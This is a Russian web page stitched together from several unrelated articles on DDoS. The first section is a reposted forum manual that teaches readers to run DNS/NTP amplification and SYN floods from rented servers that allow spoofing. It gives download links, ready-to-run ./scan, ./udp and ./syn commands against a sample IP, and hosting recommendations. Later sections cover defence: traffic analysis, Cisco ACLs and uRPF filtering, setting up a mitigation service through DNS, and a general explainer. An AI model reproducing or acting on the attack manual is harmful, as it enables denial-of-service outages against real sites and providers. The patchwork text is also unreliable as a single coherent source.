Защита от DDoS: как своими силами отбить атаку – руководство

Инструкция Делаем ддос-атаку с блекджеком и ***

Кто просматривает этот контент: «Тема» (Всего пользователей: 0; Гостей: 1)

X-Shar

Чот меня прорвало, но долго я искал ман. как делают ддос атаки вандалы, ведь верится с трудом что они платять 100$ и более, но тем не менее даже этот ресурс долго лежал, пока не поставили защиту, которая кстати стоит денег.

Статей путных так и не было и вот нашёл, не сочтите за рекламу, но я от куда беру статьи всегда ставлю линки, оригинал взял от сюда:http://rat-club.ru

Также рекомендую вначале почитать статью этого-же пользователя:На заметку — Dos и DDos для новичков.Основы

Итак сама статья уже практическая, как-же скрипт-кидди ложат сайты:

Как сказал один мой друг: виндовый ддос бот есть шлак, в любых его проявлениях!

Так оно и есть, эпоха ддос атак с многочисленных ботнетов давно прошла. Причин тому достаточно:

— нет нормальных загрузок, продают в основном одно говно в сто рук;

— нет нормального софта в паблике и в продаже, продают различные переделки с сорцов диртджампера, изменив несколько строчек кода и дизайн админки;

— из за причин выше боты мрут буквально как мухи, содержать большой ддос ботнет выходит очень затратно;

— средства защиты от ддос атак сейчас доступны каждому. некоторые хостеры держат 100/150/200 гбит. Провести такую атаку используя винботов нереально. Даже если боты сгенерируют столько траффика (для этого нужны сотни тысяч ботов!!), антиддос системы все равно быстренько перебанят всех ботов и атака будет отбита.

Современные ддосеры уже давно позабыли что такое дирт джамперы и г-боты и проводят атаки с выделенных nix серверов с широкими каналами. И сервера не простые, а те, где работает ip spoofing (подмена обратного айпи адреса).

В основном это upd amplification и syn flood, который в nix благо может быть реализован.

В этом небольшом, так сказать, мануале, я покажу новичкам как проводить такие атаки:

— SSH клиент, для отдачи команд серверам. Рекомендую xshell
Скачать: Product Download Latest Products

— FTP клиент, что бы распределять днс листы по серверам, любой который вам нравится. Можно юзать wget, но когда серверов много через фтп клиент удобнее

— Утилитка для разделения txt файла на части. Я использовал split

— Собственно сами скрипты udp, syn и сканнер открытых днс резолверов для udp amplification (так же добавил ntp attack и ntp checker с аналогичным принципом использования) Скриты могу позже выложить побольше)
Скачать: https://mega.co.nz/#!6xl3SIaK!stJbF. x_nVoVzENC7LeEA

— Ну и конечно сами сервера. Например Ecatel • Dedicated servers in Amsterdam — Home любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает.

Покупаем centos или debian 64 bit, без панели управления. Она нам не нужна, нам нужен только ssh.
В конце мануала я еще дам ссылки на хостеров у которых можно арендовать нужные сервера.

2)Ну вот, предположим вы купили сервер. Коннектимся к нему через ssh клиент.

Сначала установим glibc необходимый для работы скриптов:
yum install glibc.i686 если centos
apt-get install glibc.i686 если debian

Далее заливаем udp, syn и scan на сервер через фтп клиент или
wget host.com — Deze website is te koop! — de beste bron van informatie over Host. и тд.
Ставим на них права 777 в фтп клиенте или
chmod -R 777 syn

3)На этом пока все, теперь переходим к днс листам.

Для udp amplification нам понадобятся списки открытых днс резолверов с нужным нам ответом от них.

Благо хостеру ecatel абсолютно похуй чем вы занимаетесь на своих серверах, поэтому можно смело сканить прямо с них. В других датацентрах я бы не советовал так делать, потому что большинство абуз приходят как раз таки за скан. И вообще что бы насканить лист хватит какой нибудь впски с 100 мбит каналом.

На каждый сервер нужно примерно 20к днсок, которые мы насканим при помощи скрипта scan. Учтите что на каждый сервер нужен отдельный лист, поэтому если у вас несколько серверов, мы насканим один большой лист и распилим его на нужное количество частей.

Пример использования:
./scan 1 99999 list.txt 3 admin.gull.ca 3800
Где:
1 — начало диапазона
99999 — конец диапазона
list.txt — файл куда будут сохранятся днски
3 — количество потоков, 3 как раз на гигабитный канал
admin.gull.ca — домен для скана с кучей А записей
3800 — размер ответа в байтах.

4)Мануал по тому как сделать свой домен для скана я приложу чуть позже в дополнение к этому мануалу, а пока домены берем халявные у этих пидоров:

DNS Amplification Attacks Observer
Проверяем их командой dig:
dig A admin.gull.ca
или
dig ANY admin.gull.ca
Если ответ 3800+ — смело сканим на этот домен.

И так с этим разобрались, у нас есть готовый list.txt c днсками внутри. Теперь нужно распилить его утилиткой split на нужное количество частей.

Например лист получился 10598412 байт, нужно 3 листа на 3 сервера. Запускаем через cmd:
split list.txt 3532804
И утилитка порежет list.txt на куски по 3532804 байт, то есть на 3 равные части.

Теперь берем эти листы и распределяем по серверам.
Можете другой утилиткой это делать, главное принцип понятен.

Готово? Можно ддосить !

Udp flood запускаем так:
./udp 121.2.2.10 80 list.txt 99 1000
80 — порт
list.txt — лист наш естественно
99 — количетсво потоков, больше 100 ставить не рекомендую
1000 — длительность атаки в секундах.

Syn flood запускаем так:
./syn 121.2.2.10 21 100 -1 1000
21 — порт
100 — количество потоков, больше 100 тоже не стоит ставить
-1 — лимит pps, то есть -1 это без лимита
1000 — длительность атаки в секундах.

Один сервер генерирует около 10-11 гбит udp траффика и около 1 млн pps syn пакетов. Это именно для серверов ecatel. В других датацентрах ппс и гигабиты на выходе могут отличаться.

Использовать сервера в разы эффективнее и дешевле обходится чем содержание большого ботнета.
Да, все делается ручками, это вам не штормбот . Зато на халяву

Надеюсь информация эта будет кому нибудь полезна, если хоть один чел отсюда узнает что то для себя новое — значит я не зря все это писал .
Если что то интересует, спрашивайте, дополню расскажу подскажу разжую помогу. Успехов, дедосеры

Вот несколько дц где еще можно купить сервера со спуфингом:

Методы защиты от DDoS нападений

DDoS нападения – вызов Internet сообществу. В то время как существует большое количество программ для предотвращения DDoS атак, большинство из них не применимо для небольших сетей или провайдеров. В конечном счете, вы сами должны защитится от DDoS. Это значит, что вы должны четко знать, как реагировать на нападение — идентифицируя трафик, разрабатывая и осуществляя фильтры. Подготовка и планирование, безусловно, лучшие методы для того, чтобы смягчить будущие DDoS нападения.

Обнаружение DDoS нападения

Чтобы идентифицировать и изучить пакеты, мы должны анализировать сетевой трафик. Это можно сделать двумя различными методами в зависимости от того, где исследуется трафик. Первый метод может использоваться на машине, которая расположена в атакуемой сети. Tcpdump — популярный сниффер, который хорошо подойдет для наших целей. Анализ трафика в реальном масштабе времени невозможен на перегруженной сети, так что мы будем использовать опцию «-w», чтобы записать данные в файл. Затем, используя инструмент типа tcpdstat или tcptrace, мы проанализируем результаты. Результаты работы tcpdstat, на нашем tcpdump файле: Как видно, эти простые утилиты могут быстро помочь определить тип преобладающего трафика в сети. Они позволяют сэкономить много времени, анализируя и обрабатывая зафиксированные пакеты.

Для контроля входящего трафика может использоваться маршрутизатор. С помощью списков ограничения доступа, маршрутизатор может служить основным пакетным фильтром. Скорее всего он также служит шлюзом между вашей сетью и интернетом. Следующий пример от Cisco иллюстрирует очень простой способ использовать списки доступа, чтобы контролировать входящий трафик: Используя команду «show access-list», система покажет количество совпавших пакетов для каждого типа трафика: Результаты просты, но эффективны – обратите внимание на высокое число ICMP echo-reply пакетов. Подробная информация может быть собрана о подозреваемых пакетах, добавляя в конец команду «log-input» к специфическому правилу. Это правило будет регистрировать информацию о любом ICMP трафике: Маршрутизатор теперь более подробно регистрирует собранные данные (которые можно посмотреть используя «show log») о соответствующих пакетах. В пример ниже, файл регистрации показывает несколько пакетов, соответствующих правилу DENY ICMP: Обратите внимание на информацию, содержавшуюся в каждой строке: источник и адрес назначения, интерфейс и правило, которому оно соответствует. Этот тип детальной информации поможет определить нашу защиту.

Реакция

Отслеживаем источник атаки

Ограничение допустимого предела (“rate limit”)

Фильтрация черной дыры

Важно отметить, что адресная фильтрация — не лучший способ защиты против DDoS нападений. Даже если вы заблокировали нападение на своем маршрутизаторе или межсетевой защите – все еще большие порции входящего трафика могут затруднить прохождение законного трафика. Чтобы действительно облегчить эффект от DDoS нападения, трафик должен быть блокирован в вышестоящей цепочке – вероятно на устройстве, управляемом большим провайдером. Это означает, что многие из программ, которые утверждают, что предотвращают DDoS нападения, в конечном счете, бесполезны для маленьких сетей и их конечных пользователей. Кроме того, это означает, что предотвращение DDoS нападения, в некоторый момент, не зависит от нас. Это печальная правда, понятная любому, кто когда-либо имел дело с проблемой.

Предотвращение

Нужно включить команду «ip verify unicast reverse-path» (или не Cisco эквивалент) на входном интерфейсе подключения восходящего потока данных. Эта особенность удаляет поддельные пакеты, главную трудность в защите от DDoS нападений, прежде, чем они будут отправлены. Дополнительно, удостоверьтесь, что блокирован входящий трафик с исходными адресами из зарезервированных диапазонов (то есть, 192.168.0.0). Этот фильтр удалит пакеты, источники которых очевидно неправильны.

Входящие и исходящие методы фильтрации, также критичны для предотвращения DDoS нападений. Эти простые списки ограничения доступа, если внедрены всеми ISP провайдерами и большими сетями, могли бы устранить пересылку поддельных пакетов в общедоступный интернет, сокращая тем самым время, требуемое для розыска атакующего. Фильтры, помещенные в граничные маршрутизаторы, гарантируют, что входящий трафик не имеет исходного адреса, происходящего из частной сети и что еще более важно, что трафик на пересекающихся курсах действительно имеет адрес, происходящий из внутренней сети. RFC2267 — большой основа для таких методов фильтрации.

Наконец важно составить точный план мероприятий ПРЕЖДЕ чем, произошло нападение.

Заключение

Подписывайтесь на каналы «SecurityLab» в Telegram и Яндекс.Дзен, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

H Защита сайта от DDOS атаки. Руководство для «чайников» в черновиках Recovery Mode

.collapse»>Содержание

Как я познакомился с DDOS атаками или как родилась эта инструкция


Немного истории. Экономический кризис в 2015 г. очень сильно повлиял на рынок и некоторые компании начали бороться с конкурентами черными методами. В прошлом году сразу двое моих знакомых владельцев бизнеса попросили меня о помощи. Их сайты подверглись атакам. Специалистов по техподдержке у обоих сайтов на тот момент не было.
Первый сайт, работу которого я восстанавливал — www.arsmebel.ru — типовой магазин испанской и итальянской мебели в Москве. Продажи магазина прошлой весной упали в России очень сильно. У всех игроков на рынке начались убытки и борьба за последних клиентов обострилась.
Второй, сайт — network.msk.ru — занимается продажей оборудования Cisco. Примечателен он тем, что в нем закупалось цисковское оборудование для Хабра. Проблема с этим сайтом возникла осенью 2015 г, когда после летнего периода началось хоть какое-то более-менее оживление на телекоммуникационном рынке. Предположу, что по Cisco был какой-то не особенный ажиотаж и кто-то хотел продать больше других.
Описанная ниже предельно простая методика защиты от DDOS успешно проверена на этих двух сайтах. Все проделанные мною работы я свел в короткую инструкцию. Если на защиту от DDOS атаки первого сайта я потратил 3 дня, т.к. был совсем не в курсе, что делать, то второй сайт я вытащил из-под атаки за 2 часа.

Как понять, что сайт подвергся DDOS атаке?

Если более в течение дня вы наблюдаете непонятную картину: сайт не открывается вообще или открывается очень медленно, то вероятно, что вы подверглись атаке (или проблемы на хостинге).
Что надо проверить:
1. Зайдите в хостинг своего сайта
2. Напишите в техподдержку письмо или через чат-клиент (идеальный вариант) вопрос – «У меня через раз открывается сайт, подскажите, пожалуйста, в чем проблема?». На хороших хостингах техподдержка работает 24 часа, и вы получите ответ в течение часа. Через чат-клиент вы получите ответ в считанные минуты.
3. «Техподдержка» хостинга быстрее всех даст вам ответ – идет DDOS атака или какие-то перебои в работе хостинга.

Как защитить сайт от DDOS атаки?

Имейте ввиду такой нюанс. Те, кто организовал на вас атаку, тратят на это деньги. Ежедневная оплата у них приличная. Как только конкуренты или злопыхатели поймут, что ваш сайт защищен, то атака скорее всего закончится через несколько дней. Именно поэтому тратится сразу на долговременную (квартал или год) защиту от DDOS не целесообразно. Проще купить минимальный период защиты, а потом при необходимости защиту сайта продлить.

Два варианта защиты от DDOS

Вариант 1 — самый быстрый. У вашего хостинг-провайдера есть услуга защиты от DDOS атак, о нашичии такой услуги легко уточнить у той же «Техподдержки». Если услуга есть, то не тратьте время – включайте её на самый минимальный период: 1 неделя, 2 недели, месяц.

Из минусов – это, вероятно, обойдется дороже, чем описанный далее метод.

Вариант 2 – дешевый, когда хотите сэкономить или у хостинг провайдера нет услуги защиты от DDOS.
Тогда делаем следующее:

  • Идем на сторонний сервис защиты от DDOS. Я могу порекомендовать только тот, который меня уже два раза выручал, это DDoS-GUARD, заходим сразу в раздел удаленная защита сайта: ddos-guard.net/ru/retail/#remote-websites-protection
  • Оцениваем, какой уровень защиты нам потребуется, он зависит от посещаемости сайта. Мне хватало защиты «Basic».

  • Ничего не покупая, сразу пишем в чат-клиент нашу проблему. И далее говорим, что нам надо защитить сайт на нашем текущем хостинге.

  • Тут работает круглосуточная онлайн поддержка, которая далее проведет вас по всем шагам настройки защиты. Ребята реальные молодцы. Они всё вам последовательно разжуют, что и как нужно дальше сделать.
  • Далее вы проплачиваете свой вариант защиты и делаете минимальные настройки на хостинге своего сайта.

Собственно, на этом можно заканчивать инструкцию, т.к. дальше я уже передал вас в надежные руки. Но если вам интересно, то вот вкратце шаги, которые вам будет предстоять сделать.

Как настраивается защита сайта от DDOS?

В процессе защиты от DDOS атаки вас ждут следующие шаги:
a) Если у вашего сайта нет выделенного IP адреса, то его придется купить у вашего хостинг провайдера. Там небольшая месячная плата (примерно 150 руб). IP адрес активируется достаточно быстро.
b) Для подключения услуги удаленной защиты, необходимо провести настройки вашего домена, точнее направить «А запись» вашего домена, на IP адрес сервиса защиты от DDOS – этот IP адрес вам скажут в чате сервиса DDoS-GUARD.
c) С IP адресом DDoS-GUARD идем свой хостинг и ищем там настройки «А-записей» (у моего хостинг провайдера они прятались в разделе «DNS зоны»). Хелп по настройке А-записей на примере хостинга Мастерхост: masterhost.ru/support/doc/dns-editor/#typical-a Если потерялись – пишите или звоните своему хостинг-провайдеру, технари быстро подскажут, где и как что сделать.
Мне пришлось настроить две «А записи». У меня настройка выглядела так:

  • старую запись: @ IN A — ОТКЛЮЧИЛ!
  • новую создал: @ IN A 186.2.161.83 (это IP адрес, который дал DDOS Guard)
  • старую запись: www IN A — ОТКЛЮЧИЛ!
  • новую создал: www IN A 186.2.161.83 (это IP адрес, который дал DDOS Guard)

d) В некоторых случаях потребуется добавить в исключения брандмауэра IP адрес DDOS Guard. С этим также надо обращаться к хостинг провайдеру. Мои хостинги не блокировали IP адреса. Так что этот пункт я не делаю.
e) Всё, сервис активирован. Для проверки работы сервиса идем сюда: check-host.net/check-dns, вбиваем адрес своего сайта и ждем, когда в таблице в поле «Результат» везде появится IP адрес сервиса DDOS-Guard.
Всё, защита от DDOS активна. Наслаждаемся своим вновь работающим сайтом!

Отключаем защиту сайта от DDOS атак

Прошел месяц пользования услуги защиты от DDOS. Пора её отключить и посмотреть, есть ли смыл дальше тратить деньги.
Заходим на свой хостинг. Отключаем новые «А записи» и включаем старые. Услугу выделенного IP адреса также отключаем.
Дальше некоторое время наблюдаем за работой сайта. Очень вероятно, что DDOS атака уже давно закончилась. Ну, а если это не так, то вы уже знаете, как включить защиту за пару часов!
На этом всё!
Буду очень рад, если кому-то моя инструкция пригодится!

PS Друзья, если я упустил какие-то важные моменты, пиши в комментариях замечания, я подправлю!
PPS И еще раз спасибо DDOS-Guard за отличный клиентский сервис!

Ddos атака — подробное руководство. Что такое ddos атаки, как их осуществляют и методы защиты от них

Если прочитайте наше руководство, и внедрите все описываемые технологии — обезопасите ваш компьютер от хакерских угроз! Не пренебрегайте этим!

В области информационной безопасности, ddos атаки занимают одно из лидирующих мест, в рейтинге электронных угроз. Но большинство пользователей имеют очень ограниченные знания в данной тематике. Сейчас мы попытается максимально подробно и доступно раскрыть эту тему, чтобы вы могли представлять себе, что означает данный тип электронной угрозы, как она осуществляется, и соответственно, как эффективно с ней бороться. Итак знакомьтесь — DDOS атака.

Терминология

Чтобы разговаривать на одном языке, мы должны ввести термины и их определения.

Dos атака — атака типа «отказ в обслуживании». Отсюда и английская аббревиатура dos — Denial of Service. Один из подтипов — распределенная атака, осуществляющаяся одновременно с нескольких, а как правило, с большого количества хостов. Основную часть обсуждения мы посвятим именно этому варианты, потому что ddos атака несет в себе больше разрушительных последствий, а существенная разница лишь в количестве хостов, используемых для атаки.

Чтобы вам было легче понять . Подобного рода действия направлены на временное прекращение работы какого-либо сервиса. Это может быть отдельный сайт в сети, крупный интернет или сотовый провайдер, а также отдельная служба (прием пластиковых карт). Чтобы атака удалась, и принесла разрушительные действия, выполнять ее нужно с большого количества точек (далее этот момент будет рассмотрен более подробно). Отсюда и «распределенная атака». Но суть остается та же — прервать работу определенной системы.

Для полноты картины, нужно понимать, кто и с какой целью проводит подобные действия.

Атаки типа «отказ в обслуживании», как и прочие компьютерные преступления, караются по закону. Поэтому материал представлен лишь в ознакомительных целях. Их осуществляют it-специалисты, люди, хорошо разбирающиеся в тематиках «компьютеры» и «вычислительные сети», или как уже стало модным говорить — хакеры. В основном, данное мероприятие направленно на получение прибыли, ведь как правило, ddos атаки заказывают недобросовестные конкуренты. Здесь уместно будет привести небольшой пример.

Допустим на рынке услуг небольшого города есть два крупных провайдера интернет. И один из них хочет вытеснить конкурента. Они заказывают в хакеров распределенную dos атаку на сервера конкурента. И второй провайдер из-за перегрузки своей сети не в силах больше предоставлять доступ в интернет своим пользователям. Как итог — потеря клиентов и репутации. Хакеры получают свое вознаграждение, недобросовестный провайдер — новых клиентов.

Но нередки случаи, когда «ддосят» и просто ради забавы, или оттачивания навыков.

Распределенная Ddos атака

Давайте сразу договоримся — разбирать мы будем именно компьютерные атаки. Поэтому если речь идет о нескольких устройствах, с которых проводится атака, это будут именно компьютеры с противозаконным программным обеспечением.

Тут тоже уместно сделать небольшое отступление . По сути, для того, чтобы прекратить работу какого-либо сервиса или службы, нужно превысить максимально допустимую для него нагрузку. Самый простой пример — доступ к веб-сайту. Так или иначе, он рассчитан на определенную пиковую посещаемость. Если в определенный момент времени на сайт зайдут в десять раз больше людей, то соответственно сервер не в состоянии будет обработать такой объем информации, и перестанет работать. А подключения в этот момент, будут осуществляться с большого количества компьютеров. Это и будут те самые узлы, о которых шла речь выше.

Давайте посмотрим, как это выглядит на схеме ниже:

Как вы видите, хакер получил управления большим числом пользовательских компьютеров, и установил на них свое шпионское программное обеспечение. Именно благодаря ему он теперь может выполнять необходимые действия. В нашем случае — осуществлять ddos-атаку.

Таким образом, если не соблюдать правила безопасности при работе за компьютером, можно подвергнуться вирусному заражению. И возможно ваш компьютер будет использовать в качестве узла, для осуществления злонамеренных действий.

Вам пригодится: мы описывали некоторые аспекты безопасности, в статье настройка маршрутизатора cisco.

А вот каким образом они будут использоваться, зависит от того, какой вариант выбран злоумышленник

Классификация ddos атак

Стоит почитать

Зачем искать информацию на других сайтах, если все собрано у нас?

Ссылка на основную публикацию